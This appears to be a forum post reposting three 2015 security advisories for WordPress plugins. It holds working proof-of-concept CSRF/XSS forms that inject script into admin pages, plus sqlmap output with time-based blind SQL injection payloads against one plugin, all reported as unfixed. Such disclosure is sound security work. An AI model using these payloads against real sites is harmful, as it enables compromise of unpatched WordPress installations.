[align=right]آسیب پذیری XSS در سه پلاگین وردپرس:
1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting
[/align]
2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting
3- WordPress Advertisement Management 1.0 Cross Site Scripting
1- WordPress Customize Youtube Videos 0.2 Cross Site Scripting
کد:
Title: WordPress 'Customize Youtube Videos' Plugin Version: 0.2 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-16 Download: - https://wordpress.org/plugins/customize-youtube-videos/ - https://plugins.svn.wordpress.org/customize-youtube-videos/ Notified Vendor/WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== This plugin lets you customize the Youtube videos you are going to embed in your posts and pages ## CSRF/XSS vulnerabilities ========================================================== Customized video settings are displayed unsanitized when pressing "Get the new embed code for your customized Youtube video". PoC: Log in as admin and submit the following form <form method="POST" action="[URL]/wp-admin/admin.php?page=customize-youtube-videos"> <input type="text" name="code" value="'></iframe></textarea><script>alert(1)</script>"><br /> <input type="text" name="start" value="'></iframe></textarea><script>alert(2)</script>"><br /> <input type="text" name="end" value="'></iframe></textarea><script>alert(3)</script>"><br /> <input type="text" name="autohide" value="'></iframe></textarea><script>alert(4)</script>"><br /> <input type="text" name="autoplay" value="'></iframe></textarea><script>alert(5)</script>"><br /> <input type="text" name="cc_load_policy" value="'></iframe></textarea><script>alert(6)</script>"><br /> <input type="text" name="controls" value="'></iframe></textarea><script>alert(7)</script>"><br /> <input type="text" name="loop" value="'></iframe></textarea><script>alert(8)</script>"><br /> <input type="text" name="rel" value="'></iframe></textarea><script>alert(9)</script>"><br /> <input type="text" name="showinfo" value="'></iframe></textarea><script>alert(10)</script>"><br /> <input type="submit"> </form> ## Solution ========================================================== No fix available ========================================================== XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
2- WordPress Copy Or Move Comments 1.0.0 Cross Site Scripting
کد:
Title: WordPress 'Copy or Move Comments' Plugin Version: 1.0.0 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-16 Download: - https://wordpress.org/plugins/copy-or-move-comments/ - https://plugins.svn.wordpress.org/copy-or-move-comments/ Notified WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== Using Copy/Move WordPress Plugin the admin can copy or move any comment from several types of pages to any other page! ## Vulnerabilities ========================================================== Two POST parameters are printed unsanitized on the plugins admin page. PoC: Log in as admin and submit the following form: <form method="POST" action="[URL]/wp-admin/admin-ajax.php"> <input type="text" name="action" value="get_all_posts" readonly><br /> <input type="text" name="post_type" value="'</script><script> alert(1)</script>"><br /> <input type="text" name="action_type" value="'</script><script> alert(2)</script>"><br /> <input type="submit"> </form> Some of the SQL queries are exploitable from the admin page. SQLMAP log snippet: POST parameter 'source_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y ... POST parameter 'target_post' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y sqlmap identified the following injection points with a total of 174 HTTP(s) requests: --- Parameter: source_post (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects /wp422/wp-admin//admin.php?page=copy-move%26error=1©-move=move&all_post_types=post&source_post=1 AND (SELE CT * FROM (SELECT(SLEEP(5)))HzuL)&move_comment_id[]=1&target_post=10&action=action_move Parameter: target_post (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: option_page=copy-move-settings-group&action=update&_wpnonce=5fd9b35c58&_wp_http_referer=/projects /wp422/wp-admin//admin.php?page=copy-move%26error=1©-move=move&all_post_types=post&source_post=1&move_comm ent_id[]=1&target_post=10 AND (SELECT * FROM (SELECT(SLEEP(5)))kBfe)&action=action_move --- ## Solution ========================================================== No fix available ========================================================== Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
کد:
Title: WordPress 'Advertisement Management' Plugin Version: 1.0 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-16 Download: - https://wordpress.org/plugins/advertisement-management/ - https://plugins.svn.wordpress.org/advertisement-management/ Notified WordPress: 2015-06-21 ========================================================== ## Plugin description ========================================================== Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend. ## XSS/CSRF vulnerabilities ========================================================== The settings on the admin page is vulnerable to XSS. PoC: Log in as admin and submit the this form <form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> <input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br /> <input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br /> <input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br /> <input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br /> <input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br /> <input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br /> <input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br /> <input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br /> <input type="submit"> </form> After having done this, some of the injected scripts will be executed when loading the front page of the site. ## Solution ========================================================== No fix available ========================================================== XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.